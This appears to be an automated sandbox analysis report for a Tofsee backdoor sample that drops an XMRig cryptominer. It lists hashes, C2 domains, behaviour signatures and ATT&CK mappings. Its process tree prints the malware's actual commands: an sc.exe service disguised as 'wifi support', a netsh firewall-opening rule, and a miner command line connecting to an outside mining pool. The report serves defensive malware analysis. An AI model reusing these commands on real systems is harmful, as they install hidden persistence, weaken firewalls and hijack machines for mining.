Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    21-01-2022 09:41

General

  • Target

    d6371b26f0bfb486de78d9617bafb8a5c64534a13ef2fb1dfce67d782d77f5e3.exe

  • Size

    327KB

  • MD5

    40361ac1f920b4a827d220d0d9f4375b

  • SHA1

    4bbb651b1d9872365031216e69201d890834dc5d

  • SHA256

    d6371b26f0bfb486de78d9617bafb8a5c64534a13ef2fb1dfce67d782d77f5e3

  • SHA512

    2ecb8454df2881686250454779c6e4ba7ab39d482910419a34474ab9e7c176a318a2d8a7c351261d44ac4e59c629bc79a6aed73ba956f0a0c292503937d2ad21

Malware Config

Extracted

Family

tofsee

C2

patmushta.info

ovicrush.cn

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d6371b26f0bfb486de78d9617bafb8a5c64534a13ef2fb1dfce67d782d77f5e3.exe
    "C:\Users\Admin\AppData\Local\Temp\d6371b26f0bfb486de78d9617bafb8a5c64534a13ef2fb1dfce67d782d77f5e3.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1560
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ryrfxidf\
      2⤵
        PID:628
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\kffyjtld.exe" C:\Windows\SysWOW64\ryrfxidf\
        2⤵
          PID:3944
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ryrfxidf binPath= "C:\Windows\SysWOW64\ryrfxidf\kffyjtld.exe /d\"C:\Users\Admin\AppData\Local\Temp\d6371b26f0bfb486de78d9617bafb8a5c64534a13ef2fb1dfce67d782d77f5e3.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:260
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ryrfxidf "wifi internet conection"
            2⤵
              PID:3760
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ryrfxidf
              2⤵
                PID:2928
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3796
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 672
                  2⤵
                  • Program crash
                  PID:3888
              • C:\Windows\SysWOW64\ryrfxidf\kffyjtld.exe
                C:\Windows\SysWOW64\ryrfxidf\kffyjtld.exe /d"C:\Users\Admin\AppData\Local\Temp\d6371b26f0bfb486de78d9617bafb8a5c64534a13ef2fb1dfce67d782d77f5e3.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2920
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:2968
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2468
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 532
                  2⤵
                  • Program crash
                  PID:1720
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1560 -ip 1560
                1⤵
                  PID:2252
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2920 -ip 2920
                  1⤵
                    PID:1596
                  • C:\Windows\System32\WaaSMedicAgent.exe
                    C:\Windows\System32\WaaSMedicAgent.exe 3e92150326b183e91e18c07acba72289 GR0me9U24E+ri1QlgabnZA.0.1.0.0.0
                    1⤵
                    • Modifies data under HKEY_USERS
                    PID:3584
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
                    1⤵
                      PID:2068

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Persistence

                    New Service

                    1
                    T1050

                    Modify Existing Service

                    1
                    T1031

                    Registry Run Keys / Startup Folder

                    1
                    T1060

                    Privilege Escalation

                    New Service

                    1
                    T1050

                    Defense Evasion

                    Modify Registry

                    1
                    T1112

                    Discovery

                    Query Registry

                    1
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\kffyjtld.exe
                      MD5

                      695c48a3202b2f68a07c888627fae69b

                      SHA1

                      3123a50f0f850ef64db7d859b6adab4ac7c5b5b8

                      SHA256

                      da7fecc34427453fd91cc27468bcbe0e4b0c4141137717a327770a3815578e71

                      SHA512

                      1c45e6f0ac3a5f389b4c152815b23fb611996661f452424b83589a646287a8b73c89ca8ae1fcd76d099e5316c3a76580d3336f430aad37898d7d20e3ecb6f95a

                    • C:\Windows\SysWOW64\ryrfxidf\kffyjtld.exe
                      MD5

                      695c48a3202b2f68a07c888627fae69b

                      SHA1

                      3123a50f0f850ef64db7d859b6adab4ac7c5b5b8

                      SHA256

                      da7fecc34427453fd91cc27468bcbe0e4b0c4141137717a327770a3815578e71

                      SHA512

                      1c45e6f0ac3a5f389b4c152815b23fb611996661f452424b83589a646287a8b73c89ca8ae1fcd76d099e5316c3a76580d3336f430aad37898d7d20e3ecb6f95a

                    • memory/1560-130-0x0000000000920000-0x000000000094A000-memory.dmp
                      Filesize

                      168KB

                    • memory/1560-131-0x0000000000760000-0x0000000000773000-memory.dmp
                      Filesize

                      76KB

                    • memory/1560-132-0x0000000000400000-0x00000000005D9000-memory.dmp
                      Filesize

                      1.8MB

                    • memory/2468-157-0x0000000002C00000-0x0000000002CF1000-memory.dmp
                      Filesize

                      964KB

                    • memory/2468-153-0x0000000002C00000-0x0000000002CF1000-memory.dmp
                      Filesize

                      964KB

                    • memory/2920-140-0x0000000000400000-0x00000000005D9000-memory.dmp
                      Filesize

                      1.8MB

                    • memory/2920-139-0x0000000000610000-0x0000000000623000-memory.dmp
                      Filesize

                      76KB

                    • memory/2920-135-0x0000000000690000-0x00000000006B4000-memory.dmp
                      Filesize

                      144KB

                    • memory/2968-141-0x0000000005000000-0x000000000520F000-memory.dmp
                      Filesize

                      2.1MB

                    • memory/2968-143-0x0000000004170000-0x0000000004176000-memory.dmp
                      Filesize

                      24KB

                    • memory/2968-145-0x0000000004180000-0x0000000004190000-memory.dmp
                      Filesize

                      64KB

                    • memory/2968-147-0x00000000041D0000-0x00000000041D5000-memory.dmp
                      Filesize

                      20KB

                    • memory/2968-149-0x000000000A000000-0x000000000A40B000-memory.dmp
                      Filesize

                      4.0MB

                    • memory/2968-151-0x00000000054D0000-0x00000000054D7000-memory.dmp
                      Filesize

                      28KB

                    • memory/2968-136-0x0000000002E00000-0x0000000002E15000-memory.dmp
                      Filesize

                      84KB